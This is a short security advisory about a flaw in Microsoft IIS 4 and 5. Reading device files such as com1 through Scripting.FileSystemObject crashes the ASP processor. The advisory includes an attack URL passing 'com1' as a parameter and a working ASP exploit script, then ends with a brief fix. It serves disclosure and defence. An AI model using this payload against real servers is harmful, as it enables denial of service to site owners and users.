Vulnerability IIS Affected MS IIS 4, 5 Description VIPER_SV /nerf/team/ found following. Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll). So, if you have permission on creating .asp-file, you can crash ASP-processor. Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will crash asp-processor. http://host.int/scripts/script.asp?script=com1 ASP-Exploit: <% Dim strFileName, objFSO, objFile Set objFSO = Server.CreateObject("Scripting.FileSystemObject") strFileName = "com1" Set objFile = objFSO.OpenTextFile(strFileName) Response.Write objFile.ReadAll objFile.Close %> Solution Fix Scripting.FileSystemObject (have to check file for existing before openning.